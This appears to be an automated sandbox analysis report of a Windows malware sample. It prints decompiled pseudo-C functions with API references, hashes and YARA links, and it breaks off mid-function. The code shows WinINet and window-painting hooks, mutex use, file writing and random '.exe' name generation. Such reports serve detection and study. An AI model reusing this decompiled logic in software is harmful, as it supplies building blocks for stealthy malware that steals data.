InternetSetStatusCallbackW.WININET(?,00411735), ref: 004117C1
InternetReadFileExA.WININET ref: 00411801
GetLastError.KERNEL32 ref: 0041180B
InternetSetStatusCallbackW.WININET(?,?), ref: 0041186F

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: fd18615733225a20aa3a314188140ba63560497f87dda7cd07e5c322a32010a2
Instruction ID: ef24eefe269be4bdbb3d4708b88f2377c86c4d40e504190afa2be49e483ef1ae
Opcode Fuzzy Hash: fd18615733225a20aa3a314188140ba63560497f87dda7cd07e5c322a32010a2
Instruction Fuzzy Hash: AA318D31508355AFCB11EFA4DC80A9ABBE8FF48344F00492EF994D7261D738C994DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C693, Relevance: 7.6, APIs: 5, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C693(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E004159A4(_t18,  &_v32);
				if(E0041BCB4(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E0041596E(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0041B785( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E00416F5E(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x0040c6a0
0x0040c6a3
0x0040c6a4
0x0040c6a7
0x0040c6a9
0x0040c6bf
0x0040c775
0x0040c779
0x0040c779
0x0040c6de
0x0040c6e4
0x0040c6ea
0x00000000
0x00000000
0x0040c6f9
0x0040c6fa
0x0040c6fc
0x0040c720
0x0040c751
0x0040c754
0x0040c75d
0x0040c766
0x0040c76f
0x0040c76f
0x00000000
0x0040c727
0x0040c727
0x0040c72c
0x0040c74b
0x0040c74b
0x00000000
0x0040c74b
0x0040c735
0x0040c744
0x0040c74f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c744

APIs

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040C6DE
WriteFile.KERNEL32(0040C67B,?,00000146,?,00000000,00000000), ref: 0040C71C
WriteFile.KERNEL32(0040C67B,?,00000000,?,00000000), ref: 0040C740
FlushFileBuffers.KERNEL32(0040C67B), ref: 0040C754
CloseHandle.KERNEL32(0040C67B), ref: 0040C75D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID:
API String ID: 2459967240-0
Opcode ID: 4647fc22ef64bb527a4baeff5cc89cda7118283dfa65c5f17ddde66c96f6940d
Instruction ID: a3de2f1a3e6bd31bfb4ea313578625639b0af57ba54bee6c8eb3d6cd6bede5da
Opcode Fuzzy Hash: 4647fc22ef64bb527a4baeff5cc89cda7118283dfa65c5f17ddde66c96f6940d
Instruction Fuzzy Hash: 0421BA31940119FBCF20ABA18D85FEFBBBDAF45754F1042A6A504F3190D7359A45CEA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409662, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409662(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E004094F1( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E0041AB2E( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x00409662
0x0040966d
0x00409673
0x0040967c
0x00409689
0x0040972d
0x00409735
0x00409735
0x0040968f
0x00409692
0x0040969b
0x004096a4
0x0040969d
0x0040969d
0x0040969d
0x004096ad
0x004096f1
0x00000000
0x004096af
0x004096c8
0x004096f7
0x00409702
0x0040970d
0x00409714
0x00409720
0x00409728
0x00409728
0x00000000
0x00409720
0x004096d9
0x00000000
0x00000000
0x004096ec
0x004096f3
0x004096f5
0x00000000
0x00000000
0x00000000
0x004096f5

APIs

GetWindowInfo.USER32 ref: 00409681
IntersectRect.USER32 ref: 004096BF
IsRectEmpty.USER32(?), ref: 004096D1
IntersectRect.USER32 ref: 004096E8
GetTopWindow.USER32(?), ref: 00409718

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: b74ee9ef46f3859367229faed03e54f6a7085f8f5c06862896f5b8c33be02d13
Instruction ID: 461b42e4dd6eb344ec22d4ee4e76328b959bd1d8cb4e8704e44cdf310f582c8a
Opcode Fuzzy Hash: b74ee9ef46f3859367229faed03e54f6a7085f8f5c06862896f5b8c33be02d13
Instruction Fuzzy Hash: A7218EB21043019BD720DF29D980E57B7ECAF48754B040A2AF882E3292D739EC05DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00415A5B, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415A5B(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				intOrPtr _t18;
				void* _t26;
				void* _t40;
				WCHAR* _t43;

				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E0040679A(_t40, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E00406762(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E00406AB8(_t40, _t43, __esi, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00416F70(_t43);
					if(E004068C0() == 0) {
						L7:
						E00419BF4(_v12);
						return 0;
					}
					_push(__esi);
					_t26 = 3;
					E004159A4(_t26,  &_v104);
					if(WaitForSingleObject( *0x422e04, 0xc8) != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E0041A6A0(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
					} while (WaitForSingleObject( *0x422e04, 0xc8) == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x00415a5b
0x00415a6d
0x00415a7a
0x00415a7f
0x00415a84
0x00415a9b
0x00415aa2
0x00415aa8
0x00415ab0
0x00415ab6
0x00415abd
0x00415ac7
0x00415b26
0x00415b29
0x00000000
0x00415b30
0x00415aca
0x00415ad0
0x00415ad1
0x00415aef
0x00415b24
0x00000000
0x00415b25
0x00415af8
0x00415afb
0x00415b12
0x00415b20
0x00000000
0x00415afb
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 00415A66
SetThreadPriority.KERNEL32(00000000), ref: 00415A6D

Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 00415AB0
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 00415AE8
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 00415B1E

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: f76db52bef70e0f299830cdfa44c895cc3f0f0ecc88f06d876867b5009dbd7cc
Instruction ID: 3648b04176be29fb63c151402de928900eaf7c72da27c008d8ae4d6e3bba6211
Opcode Fuzzy Hash: f76db52bef70e0f299830cdfa44c895cc3f0f0ecc88f06d876867b5009dbd7cc
Instruction Fuzzy Hash: 45218071900208AEEF10EBA0DD85FEE77BDEF44348F500066F505FB151DA78AE858B59

Uniqueness

Uniqueness Score: -1.00%

Function 00419946, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 00419958
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00419982
WSAGetLastError.WS2_32(?,00000000), ref: 00419989
WSAIoctl.WS2_32(?,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004199B5

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

closesocket.WS2_32(?), ref: 004199C9

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: ab3abdf98109eacb7878296e987c9750da56fa20fd3d4812d25ea2e476a5cbc7
Instruction ID: f05d75a439ab7acb90d85e409405974e210e1f739583e0d08af359a4210dc9b4
Opcode Fuzzy Hash: ab3abdf98109eacb7878296e987c9750da56fa20fd3d4812d25ea2e476a5cbc7
Instruction Fuzzy Hash: EE1151B1801128BFDB20AFA6DD49CDF7E6CEF453A4B104129F905A6264D6349E81DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 00409268, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409268(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x422940 & 0x00000004) == 0 || E004068C0() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x422e14);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E0041645D( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x00409273
0x00409277
0x004092e8
0x00000000
0x00409282
0x0040928e
0x00409292
0x00000000
0x00409299
0x0040929d
0x004092a1
0x004092a9
0x004092a9
0x004092b2
0x004092b8
0x004092c8
0x004092d0
0x004092d7
0x004092da
0x004092e0
0x004092e4
0x00000000
0x004092e4
0x00409292

APIs

GetUpdateRect.USER32 ref: 004092EF

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

TlsGetValue.KERNEL32 ref: 00409288
SaveDC.GDI32(?), ref: 004092B8
SendMessageW.USER32(?,00000014,?,00000000), ref: 004092C8
RestoreDC.GDI32(?,00000000), ref: 004092DA

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 9e9ae5218391791d56f668cdf34718d154630864547899dbd5825e49e1a160e5
Instruction ID: b5c373e2439138a5cc5340ae34721950d10d8ca43e46a885cdd8b012fc9de0b9
Opcode Fuzzy Hash: 9e9ae5218391791d56f668cdf34718d154630864547899dbd5825e49e1a160e5
Instruction Fuzzy Hash: AD11A332000305BBCB215F21DD88F977BA8EB05315F00497AF996A21B2C7359854CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040945D, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040945D() {
				struct tagMSG _v32;
				signed int _t12;
				intOrPtr _t15;
				char _t17;
				intOrPtr _t19;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x422e1c);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					__eflags = _t12;
					if(_t12 == 0) {
						break;
					} else {
						__eflags = _v32.message -  *0x422e18; // 0x0
						if(__eflags == 0) {
							__eflags = _v32.wParam - 0xfffffffc;
							if(_v32.wParam == 0xfffffffc) {
								_t15 =  *0x422e20; // 0x0
								__eflags = _t15 + 0x114;
								_t17 = E00408D10(_t15 + 0x114, _t19, _t21, 0x422e10, _v32.lParam, 1);
								_t19 =  *0x422e20; // 0x0
								 *((char*)(_t19 + 0x124)) = _t17;
								SetEvent( *0x422e1c);
							}
						}
						continue;
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x00409471
0x00409483
0x004094d2
0x004094dd
0x004094e2
0x00000000
0x00000000
0x0040948d
0x0040948f
0x00000000
0x00409491
0x00409495
0x0040949b
0x0040949d
0x004094a2
0x004094a4
0x004094af
0x004094b9
0x004094be
0x004094c4
0x004094d0
0x004094d0
0x004094a2
0x00000000
0x0040949b
0x0040948f
0x004094f0

APIs

GetCurrentThread.KERNEL32 ref: 0040946A
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00407339), ref: 00409471
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00407339), ref: 00409483
SetEvent.KERNEL32(00422E10,?,00000001), ref: 004094D0
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 004094DD

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: c057419ae2c202cbb70b75038bb14a3a1dd70d8cf89247b0c48932de6c76f899
Instruction ID: 9d6a5be7b9007c6607e49dc6770454fdb0389a6fb524e1d04b32ba85218d345a
Opcode Fuzzy Hash: c057419ae2c202cbb70b75038bb14a3a1dd70d8cf89247b0c48932de6c76f899
Instruction Fuzzy Hash: F7019231608204BBDB20AB64EE05B567B64AB84330F54073AF960B71F1C6B59C62DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00407585, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004079BE,00000000), ref: 0040758B
ReleaseMutex.KERNEL32(?), ref: 004075BF
IsWindow.USER32(?), ref: 004075C6
PostMessageW.USER32(?,00000215,00000000,?), ref: 004075E0
SendMessageW.USER32(?,00000215,00000000,?), ref: 004075E8

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 31d3a91f66b1e39a8fa54b42a6178d81394c13624e3cfd5f2e86ab1d90ec2a8f
Instruction ID: 6e555f7b4e24c72762f6169ba14370e50367818c9a47a36141325bf2e7140198
Opcode Fuzzy Hash: 31d3a91f66b1e39a8fa54b42a6178d81394c13624e3cfd5f2e86ab1d90ec2a8f
Instruction Fuzzy Hash: 90F03C74508300AFD3209F24ED48DA6BBB5FB88711B044ABDF896E37B0C770A844CB26

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A7A0(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E004177A6(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E0041775A();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E0041775A() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0041775A() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E004177A6(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x0041a7b5
0x0041a7b7
0x0041a7ba
0x0041a7bf
0x0041a7c9
0x0041a7d7
0x0041a7de
0x0041a7cb
0x0041a7cb
0x0041a7ce
0x0041a7ce
0x0041a7e1
0x0041a7e3
0x0041a7e6
0x0041a7eb
0x0041a7f7
0x0041a7fa
0x0041a7fe
0x0041a80a
0x0041a818
0x0041a81f
0x0041a80c
0x0041a80c
0x0041a80f
0x0041a80f
0x0041a822
0x0041a822
0x0041a829
0x0041a83f
0x0041a842
0x0041a873
0x0041a860
0x0041a862
0x0041a863
0x0041a863
0x0041a87b
0x0041a87f
0x0041a880
0x0041a883
0x0041a88c
0x0041a88c
0x0041a893
0x0041a8ae
0x0041a899
0x0041a899
0x0041a89c
0x0041a8a0
0x0041a8a6
0x0041a8a9
0x0041a8aa
0x00000000
0x00000000
0x0041a8ac
0x00000000
0x0041a8aa
0x0041a8a0
0x0041a8b1
0x0041a8b1
0x0041a8b7
0x0041a8bb
0x0041a8c1
0x0041a8c7
0x0041a8c7
0x0041a8ce

APIs

Part of subcall function 0041775A: GetTickCount.KERNEL32 ref: 0041775A

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A8C1

Strings

aeiouy, xrefs: 0041A7CE, 0041A7D7, 0041A80F, 0041A818
bcdfghklmnpqrstvwxz, xrefs: 0041A7BF
.exe, xrefs: 0041A7AB

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: 6540bdb674bdbd286cf54d029022337dd09c51dab91e80d2168f21fba79854ec
Instruction ID: dbe99f03874a583f86b0181fa373edaf536889b9665c9f8a8753ce4936bc99d4
Opcode Fuzzy Hash: 6540bdb674bdbd286cf54d029022337dd09c51dab91e80d2168f21fba79854ec
Instruction Fuzzy Hash: 8E319F75D012199BDB11AFA9C4452FEBBB0FF40314F14846BD815AB281D378DED2CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004138CA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004138CA(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t29;
				void* _t31;
				void* _t36;
				void* _t40;
				char* _t43;
				void* _t53;
				char* _t56;
				WCHAR* _t57;
				char* _t62;
				signed int _t63;
				void* _t64;
				intOrPtr _t73;

				_t56 = __edx;
				_t53 = __ecx;
				E004164D4( &_v12,  &_v12, 0, 8);
				_t29 = 0x60;
				E004159A4(_t29,  &_v116);
				_t31 = 0x61;
				E004159A4(_t31,  &_v52);
				_t57 =  &_v636;
				_t36 = E0041A545(0x80000002, _t53, _t57,  &_v116,  &_v52, 0x104);
				if(_t36 != 0xffffffff) {
					_t67 = _t36;
					if(_t36 > 0) {
						ExpandEnvironmentStringsW(_t57,  &_v1156, 0x104);
						E00413682(_t67,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L10:
					if(_t73 <= 0) {
						return E00416421(_v12);
					}
					_push(0xcb);
					return E0041252D(_t56, _v12, 0x63);
				} else {
					_t62 =  &_v76;
					_t40 = 0x62;
					E004159A4(_t40, _t62);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t62;
					_t63 = 0;
					do {
						_t43 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t64 + _t63 * 4 - 0x18)), 0, 0, _t43);
						if(_t43 == 0) {
							_push(0);
							_push(0);
							_push(0);
							_push( &_v12);
							_push(E004136DC);
							_push(2);
							_push(1);
							_t56 =  &_v16;
							 *0x81 =  *0x81 + 0x81;
						}
						_t63 = _t63 + 1;
					} while (_t63 < 3);
					_t73 = _v8;
					goto L10;
				}
			}

0x004138ca
0x004138ca
0x004138df
0x004138e9
0x004138ea
0x004138f4
0x004138f5
0x00413908
0x00413913
0x0041391b
0x0041391d
0x0041391f
0x0041392c
0x0041393d
0x0041393d
0x0041391f
0x00413945
0x004139ad
0x004139ad
0x00000000
0x004139c4
0x004139b2
0x00000000
0x00413947
0x00413949
0x0041394c
0x0041394d
0x00413954
0x0041395b
0x00413962
0x00413969
0x0041396c
0x0041396e
0x0041396e
0x0041397c
0x00413984
0x00413986
0x00413987
0x00413988
0x0041398c
0x0041398d
0x00413992
0x00413994
0x00413996
0x004139a2
0x004139a2
0x004139a4
0x004139a5
0x004139aa
0x00000000
0x004139aa

APIs

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041392C
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041397C

Strings

#, xrefs: 00413954
&, xrefs: 00413962

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: d8e2424e081960f82d0f23edba3179dabd47d907a06cd812ecb15dd56c8aeb1c
Instruction ID: 44e02bb72e26bb9da9856e8fe2745df04b1117a493af1ea52819b976b7576cc5
Opcode Fuzzy Hash: d8e2424e081960f82d0f23edba3179dabd47d907a06cd812ecb15dd56c8aeb1c
Instruction Fuzzy Hash: DC3173F2D10218BADF10AFA0DC89EDE777CEB44718F10456BB604F7181D6B85B858B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041417A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041417A(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E004164D4( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E004159A4(_t28,  &_v120);
				_t30 = 0x78;
				E004159A4(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E0041A545(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E00413F1D(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00416421(_v12);
					}
